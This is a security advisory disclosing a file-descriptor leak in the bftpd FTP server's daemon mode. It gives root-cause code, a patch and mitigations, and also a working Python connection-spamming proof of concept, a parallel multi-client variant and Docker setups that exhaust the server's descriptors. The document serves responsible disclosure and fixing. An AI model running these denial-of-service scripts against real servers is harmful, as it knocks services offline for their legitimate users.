bftpd File Descriptor Leak Vulnerability
Summary
A file descriptor leak vulnerability exists in bftpd versions up to and including 6.4 when running in daemon mode. The vulnerability allows unauthenticated attackers to exhaust file descriptors through rapid connection attempts, leading to denial of service.
CVE ID: Pending
CVSS Score: TBD
Affected Versions: bftpd ≤ 6.4
Attack Vector: Network, unauthenticated
Impact: Denial of Service
Description
When operating in daemon mode (`-d` or `-D` flags), bftpd fails to properly close file descriptors in the parent process after accepting client connections. This results in:
- Indefinite accumulation of open file descriptors
- TCP sockets stuck in the `CLOSE_WAIT` state
- Eventual exhaustion of the process's `RLIMIT_NOFILE` limit (typically 1024)
- Rejection of all new connections by the server once the limit is reached
The vulnerability can be triggered by simply connecting and immediately disconnecting, requiring no authentication or protocol knowledge. Due to the timing-dependent nature of the underlying race condition, the vulnerability manifests in two scenarios:
- Single-threaded attacks on localhost: The microsecond-level latency of loopback connections allows the `accept()` loop to create file descriptors faster than the asynchronous SIGCHLD handler can close them.
- Parallel attacks over the network: Multiple simultaneous connections from remote hosts produce the same effect, as concurrent `accept()` calls outpace the cleanup mechanism regardless of network latency.
In both cases, the fundamental issue is that file descriptor cleanup relies on asynchronous signal handling, which cannot keep pace with synchronous socket creation under sufficient load.
Note: This vulnerability only affects daemon mode (standalone mode), which is the maintainer's preferred deployment method. Inetd mode is not vulnerable.
Affected Versions
- bftpd 6.4 and earlier (daemon mode only)
- Tested on: 5.3, 5.4, 5.5, 5.6, 5.7, 5.8, 5.9, 6.0, 6.1, 6.2, 6.3, 6.4
- Inetd mode: NOT affected
Reproduction
Prerequisites
```sh
# Install bftpd (Arch Linux example)
pacman -S bftpd

# Or Debian/Ubuntu
apt-get install bftpd
```
Steps to Reproduce
This demonstrates the single-threaded localhost exploitation. For a parallel network-based demonstration, see the Docker setup below.
Terminal 1 - Start bftpd in daemon mode:
```sh
bftpd -n -D
# Note the PID
```
Terminal 2 - Run connection spammer:
```python
# spam_bftpd.py
import socket

target_ip = "127.0.0.1"
target_port = 21

print(f"Starting spam on {target_ip}:{target_port}...")
try:
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((target_ip, target_port))
            data = s.recv(1024)  # Wait for 220 banner
            if b"220" in data:
                s.close()
        except Exception:
            pass
        finally:
            s.close()
except KeyboardInterrupt:
    print("\nStopped by user.")
```
Terminal 3 - Monitor file descriptor count:
```sh
# Replace $PID with bftpd's process ID
watch -n 0.1 "ls -l /proc/$PID/fd | wc -l"
```
Expected Result
File descriptor count should remain stable (4-5 descriptors).
Actual Result
File descriptor count increases continuously. Within a few minutes:
- FD count climbs from 4 to 50+
- `lsof` shows numerous sockets in `CLOSE_WAIT` or orphaned state
- Server eventually stops accepting connections when reaching `RLIMIT_NOFILE`
Alternative: Docker-based Reproduction
For easier reproduction without installing bftpd on your host system, two Docker Compose configurations are provided:
Prerequisites: Port 21 must be available on your host machine (no other FTP server running).
Option 1: Localhost Single-Threaded Attack (docker-compose.yml)
Demonstrates the original discovery scenario - a single-threaded client on localhost exploiting the race condition through high-speed loopback connections.
Demonstrate the Vulnerability:
```sh
# Clean any previous containers
docker compose down

# Build vulnerable version (no patch applied)
docker compose build --no-cache

# Start and watch FD count increase
docker compose up
# Output will show FD count climbing over time
# CLOSE_WAIT sockets will accumulate
```
Verify the Fix:
```sh
# Clean previous containers
docker compose down

# Build patched version (with fix applied)
APPLY_PATCH=true docker compose build --no-cache

# Start and watch FD count stay stable
APPLY_PATCH=true docker compose up
# Output will show FD count remains stable at 4-5
# No socket accumulation occurs
```
What this setup does:
- Uses `network_mode: host` for true localhost connections
- Single spam client connecting repeatedly via 127.0.0.1
- Demonstrates the microsecond-latency exploitation scenario
Option 2: Parallel Network Attack (docker-compose.parallel.yml)
Demonstrates that the vulnerability is network-exploitable through concurrent connections, simulating a realistic distributed attack.
Demonstrate the Vulnerability:
```sh
# Clean any previous containers
docker compose -f docker-compose.parallel.yml down

# Build vulnerable version (no patch applied)
docker compose -f docker-compose.parallel.yml build --no-cache

# Start and watch FD count increase
docker compose -f docker-compose.parallel.yml up
# Output will show FD count climbing over time from parallel attacks
```
Verify the Fix:
```sh
# Clean previous containers
docker compose -f docker-compose.parallel.yml down

# Build patched version (with fix applied)
APPLY_PATCH=true docker compose -f docker-compose.parallel.yml build --no-cache

# Start and watch FD count stay stable
APPLY_PATCH=true docker compose -f docker-compose.parallel.yml up
# Output will show FD count remains stable at 4-5
```
What this setup does:
- Uses Docker bridge networking (containers communicate over virtual network)
- Launches 4 parallel spam clients connecting simultaneously
- Demonstrates network-based exploitation regardless of latency
- More realistic attack scenario (distributed concurrent connections)
Both approaches isolate the vulnerable server and provide a clean, reproducible environment where both the bug and the fix can be demonstrated.
Evidence
Before Attack
```
$ lsof -p 1599915
COMMAND     PID USER  FD  TYPE  DEVICE SIZE/OFF   NODE NAME
bftpd   1599915 root cwd   DIR    8,48     4096      2 /
bftpd   1599915 root rtd   DIR    8,48     4096      2 /
bftpd   1599915 root txt   REG    8,48    80064 395732 /usr/bin/bftpd
bftpd   1599915 root   0u  CHR     1,3      0t0      4 /dev/null
bftpd   1599915 root   1u  CHR     1,3      0t0      4 /dev/null
bftpd   1599915 root   2u  CHR     1,3      0t0      4 /dev/null
bftpd   1599915 root   3u IPv4 15417400     0t0    TCP *:ftp (LISTEN)
```
During Attack (Partial Output)
```
$ lsof -p 1932715 | grep sock
bftpd   1932715 root   4u sock      0,8      0t0 17032146 protocol: TCP
bftpd   1932715 root   5u sock      0,8      0t0 17176695 protocol: TCP
bftpd   1932715 root   6u sock      0,8      0t0 17101131 protocol: TCP
[... 40+ more leaked sockets ...]
bftpd   1932715 root  29u IPv4 17776883      0t0 TCP localhost:ftp->localhost:44524 (CLOSE_WAIT)
bftpd   1932715 root  32u IPv4 17749009      0t0 TCP localhost:ftp->localhost:47960 (CLOSE_WAIT)
bftpd   1932715 root  34u IPv4 17859146      0t0 TCP localhost:ftp->localhost:53028 (CLOSE_WAIT)
[... continues accumulating ...]
```
Note: Leaked sockets initially appear in the `CLOSE_WAIT` state, then transition to orphaned file descriptors showing only as `protocol: TCP`.
Root Cause Analysis
The Bug
In `main.c` (lines 297-311), when the server accepts a connection and forks a child process, both the parent and the child inherit a copy of the socket file descriptor (`main_sock`). The child correctly uses its copy, but the parent never closes its own:
```c
while ((main_sock = accept(listensocket, (struct sockaddr *) &new, &my_length))) {
    pid_t pid;
    if (main_sock > 0) {
        pid = fork();
        if (!pid) { /* child */
            close(0);
            close(1);
            close(2);
            isparent = 0;
            dup2(main_sock, fileno(stdin));
            dup2(main_sock, fileno(stderr));
            break;
        } else { /* parent */
            struct bftpd_childpid *tmp_pid = malloc(sizeof(struct bftpd_childpid));
            tmp_pid->pid = pid;
            tmp_pid->sock = main_sock; // Stored for later cleanup
            bftpd_list_add(&child_list, tmp_pid);
            // BUG: Parent never closes main_sock!
        }
    }
}
```
The Race Condition
The parent stores the socket in a tracking list and relies on the SIGCHLD signal handler (line 153) to close it asynchronously when the child exits. This creates a critical race condition:
- Synchronous socket creation: the `accept()` loop creates new FDs in microseconds
- Asynchronous cleanup: the SIGCHLD handler fires only after the child exits, subject to signal delivery delays
- Accumulation: when connections arrive faster than the handler can process exits (via fast localhost connections or parallel network connections), FDs accumulate
- Exploitability: single-threaded on localhost, or parallel from any network location
SIGCHLD handler (too slow):
```c
void handler_sigchld(int signum)
{
    // ... zombie reaping ...
    for (i = 0; i < bftpd_list_count(child_list); i++) {
        childpid = bftpd_list_get(child_list, i);
        if ( (childpid) && (childpid->pid == pid) ) {
            close(childpid->sock); // Asynchronous cleanup - too late!
            bftpd_list_del(&child_list, i);
            free(childpid);
        }
    }
}
```
Exploitation Scenarios
The vulnerability is timing-dependent and can be triggered in two ways:
Single-Threaded Attack (Localhost)
| Connection Type | Latency | Result |
|---|---|---|
| Localhost/loopback | Microseconds | accept() loop outruns SIGCHLD delivery -> FD accumulation |
| LAN | Sub-millisecond | Natural delays usually allow cleanup to keep pace |
| WAN | Milliseconds+ | Natural delays prevent accumulation with single-threaded attacks |
With a single-threaded connection spammer, the vulnerability manifests most readily on localhost due to the extremely low latency. Each connection completes in microseconds, allowing the accept() loop to cycle faster than the asynchronous SIGCHLD handler can perform cleanup.
Parallel Attack (Any Network)
When connections are opened in parallel from multiple threads or clients, the vulnerability becomes exploitable over any network (LAN/WAN), regardless of latency. Multiple simultaneous accept() calls create file descriptors concurrently, overwhelming the single-threaded SIGCHLD cleanup mechanism. This is the more realistic attack scenario, as attackers would naturally parallelize connection attempts to maximize impact.
The Docker reproduction environment demonstrates this by running 4 parallel spam clients, showing that the vulnerability is network-exploitable and not limited to localhost scenarios.
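The parallel scenario can be sketched in-process with threads. Everything below is hypothetical scaffolding, not the repository's tooling: a throwaway listener that sends a `220` banner stands in for bftpd, and four worker threads play the role of the four spam-client containers.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

def serve(srv, stop):
    # Throwaway stand-in for bftpd: send a 220 banner, then hang up
    srv.settimeout(0.2)
    while not stop.is_set():
        try:
            conn, _ = srv.accept()
        except socket.timeout:
            continue
        except OSError:          # listener closed by the main thread
            return
        conn.sendall(b"220 fake-ftpd ready\r\n")
        conn.close()

srv = socket.socket()
srv.bind(("127.0.0.1", 0))
srv.listen(128)
port = srv.getsockname()[1]
stop = threading.Event()
threading.Thread(target=serve, args=(srv, stop), daemon=True).start()

def hammer(n):
    # One spam client: connect, read the banner, disconnect, repeat
    ok = 0
    for _ in range(n):
        s = socket.socket()
        try:
            s.connect(("127.0.0.1", port))
            if b"220" in s.recv(64):
                ok += 1
        finally:
            s.close()
    return ok

with ThreadPoolExecutor(max_workers=4) as pool:  # 4 parallel clients
    completed = sum(pool.map(hammer, [25] * 4))

stop.set()
srv.close()
print("connections completed:", completed)
```

Against a vulnerable bftpd on port 21, the same four-worker pattern is what drives the FD count past `RLIMIT_NOFILE` regardless of per-connection latency.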
Technical Details
File Descriptor Lifecycle
1. `accept()` creates FD `N` in the parent process
2. `fork()` duplicates FD `N` to the child process (both have independent copies)
3. Child uses FD `N` for communication, eventually closes it
4. Parent should close FD `N` immediately but doesn't
5. Parent stores FD `N` in `child_list` for deferred cleanup
6. SIGCHLD fires (eventually), handler closes the parent's FD `N`
7. If step 1 repeats before step 6 completes: FD leak
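The lifecycle above can be observed directly with `os.fork()`. This is a POSIX-only sketch independent of bftpd: a `socketpair()` stands in for the accepted connection, and the peer sees no EOF until the parent's copy is closed, even after the child has closed its copy and exited.

```python
import os
import socket

a, b = socket.socketpair()       # 'a' plays the accepted client socket

pid = os.fork()
if pid == 0:
    # Child (steps 2-3): inherits an independent copy of 'a', uses it, closes it
    b.close()
    a.sendall(b"handled")
    a.close()
    os._exit(0)

# Parent (steps 4-5): its own copy of 'a' is still open
os.waitpid(pid, 0)               # child has exited; its copy is gone
data = b.recv(64)                # the child's data arrives fine...

b.settimeout(0.2)
try:
    early = b.recv(1)            # ...would return b"" only on EOF
except socket.timeout:
    early = None                 # no EOF: the parent's copy keeps the conn open

a.close()                        # step 6 done synchronously (the fix)
b.settimeout(None)
eof = b.recv(1)                  # EOF (b"") is delivered immediately
print("EOF only after parent close:", early is None and eof == b"")
```

This is exactly why the leaked server sockets linger in `CLOSE_WAIT`: the kernel keeps the connection endpoint alive as long as any descriptor copy references it.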
TCP State Behavior
- `CLOSE_WAIT`: the client closed its end (FIN received), but the server's end stays open because the parent still holds its copy
- Orphaned sockets: parent FD reference lost before cleanup completes
- Both consume file descriptor slots despite being non-functional
Solution
Patch
Four coordinated changes eliminate the race condition by moving cleanup from asynchronous (signal handler) to synchronous (accept loop):
1. Remove socket field from struct (`main.h:12`)
```diff
 struct bftpd_childpid
 {
     pid_t pid;
-    int sock;
 };
```
2. Don't store the socket in the child list (`main.c:310`)
```diff
 struct bftpd_childpid *tmp_pid = malloc(sizeof(struct bftpd_childpid));
 tmp_pid->pid = pid;
-tmp_pid->sock = main_sock;
 bftpd_list_add(&child_list, tmp_pid);
```
3. Close the socket immediately in the parent (`main.c:312`)
```diff
 } else { /* parent */
     struct bftpd_childpid *tmp_pid = malloc(sizeof(struct bftpd_childpid));
     tmp_pid->pid = pid;
     bftpd_list_add(&child_list, tmp_pid);
+    close(main_sock); // FIX: Immediate synchronous cleanup
 }
```
4. Remove the redundant close in the SIGCHLD handler (`main.c:153`)
```diff
 if ( (childpid) && (childpid->pid == pid) ) {
-    close(childpid->sock);
     bftpd_list_del(&child_list, i);
     free(childpid);
```
Why This Works
- Parent doesn't need the socket - only child communicates with client
- Synchronous cleanup - FD closed immediately in accept() loop, no race possible
- Fork semantics preserved - child retains its independent copy of the FD
- Deterministic behavior - no dependency on signal timing or delivery order
- TCP correctness - both ends now close properly (child's copy + parent's copy)
The fundamental fix, moving from asynchronous to synchronous cleanup, eliminates the race condition entirely.
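The corrected pattern can be modeled the same way as the buggy one (a sketch with plain Python sockets, not the actual patch): closing the accepted descriptor in the accept loop itself, rather than deferring to a handler, keeps the process FD count flat.

```python
import os
import socket

def fd_count():
    # Linux-only: number of descriptors currently open in this process
    return len(os.listdir("/proc/self/fd"))

srv = socket.socket()
srv.bind(("127.0.0.1", 0))
srv.listen(64)
port = srv.getsockname()[1]

before = fd_count()
for _ in range(20):
    c = socket.socket()
    c.connect(("127.0.0.1", port))
    conn, _ = srv.accept()
    conn.close()         # modeled FIX: synchronous close in the accept loop
    c.close()
after = fd_count()
print(f"net new descriptors after 20 connections: {after - before}")
srv.close()
```

Unlike the buggy model, twenty connect/disconnect cycles leave the descriptor count exactly where it started, matching the stable 4-5 FDs observed with the patched Docker build.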
Impact of Fix
- Complete elimination of file descriptor leak
- No CLOSE_WAIT socket accumulation
- Denial of service prevention
- Deterministic resource management
- Reduced SIGCHLD handler overhead (faster child reaping)
- No performance impact (close() is microseconds)
- Backward compatible with all deployment modes
Inetd Mode Safety
All changes are safe for inetd mode because:
- The bug only exists in daemon mode (`-d`/`-D` flags)
- Inetd mode (`-i` flag, the default) skips the entire daemon code block
- `main_sock`, `child_list`, and the SIGCHLD handler are daemon-mode only
- Inetd handles `accept()` and `fork()` externally before launching bftpd
- The bug never existed in inetd mode
Security Impact
Attack Characteristics:
- Complexity: Low (trivial to exploit)
- Authentication: None required
- Knowledge: No FTP protocol knowledge needed
- Resources: Minimal (can DoS server in seconds with parallel connections)
- Detection: Difficult (appears as normal connection attempts)
- Network: Exploitable from localhost (single-threaded) or remotely (parallel connections)
Real-World Impact:
- Public FTP servers: Vulnerable to unauthenticated DoS
- Hosting environments: Single malicious user can affect entire server
- Automated attacks: Scripts/bots connecting repeatedly trigger the bug
- Protocol testing tools: L* learning algorithms, fuzzers, scanners inadvertently trigger it
Mitigation (Until Patched)
If upgrading is not immediately possible:
- Use inetd mode (not affected):
```sh
# In /etc/inetd.conf or systemd socket activation
ftp stream tcp nowait root /usr/bin/bftpd bftpd -i
```
- Connection rate limiting:
```sh
# iptables example - limit to 10 connections/minute per IP
iptables -A INPUT -p tcp --dport 21 -m state --state NEW \
    -m recent --name ftp --set
iptables -A INPUT -p tcp --dport 21 -m state --state NEW \
    -m recent --name ftp --update --seconds 60 --hitcount 10 -j DROP
```
- Monitor and restart:
```sh
# Watchdog script (crude but effective)
while true; do
    FD_COUNT=$(ls -l /proc/$(pidof bftpd)/fd | wc -l)
    if [ "$FD_COUNT" -gt 50 ]; then
        systemctl restart bftpd
    fi
    sleep 5
done
```
- Increase RLIMIT_NOFILE:
```sh
# Reduces impact but doesn't fix root cause
ulimit -n 65536
```
Timeline
- February 05, 2026: Vulnerability discovered during FTP protocol inference testing
- February 20, 2026: Root cause analysis completed
- February 23, 2026: Vendor notification
- TBD: CVE assignment
- TBD: Public disclosure
CVE Assignment
Since bftpd does not have a dedicated CNA (CVE Numbering Authority), a CVE request will need to be filed through MITRE using their CVE Request Form.
We are happy to handle this process if you would prefer, or we can provide any information needed if you would like to file it yourself. Please let us know how you would like to proceed.
Credits
Discovered by: Alexander Trifa
Institution: Télécom SudParis
Contact: alexander.trifa@polytechnique.edu (institutional), security@alexandertrifa.dev (permanent)
Research Supervisor: Olivier Levillain (olivier.levillain@telecom-sudparis.eu)
Discovered during Bachelor Thesis research on Active Automata Learning for network protocol analysis.
References
- bftpd homepage
- Source repository
- Affected code: `main.c` (daemon mode accept loop and SIGCHLD handler)
Files
Patch and Fix
- `bftpd-fdleak.patch` - Complete diff with changes
Reproduction and Testing
- `spam_bftpd.py` - Proof of concept / reproducer script
- `docker-compose.yml` - Localhost single-threaded reproduction environment
- `docker-compose.parallel.yml` - Parallel network attack reproduction environment
- `Dockerfile.server` - Builds vulnerable bftpd server (optionally applies patch)
- `Dockerfile.client` - Builds spam client container
Disclaimer: This vulnerability information is provided for defensive purposes. Unauthorized testing against systems you do not own or have permission to test is illegal.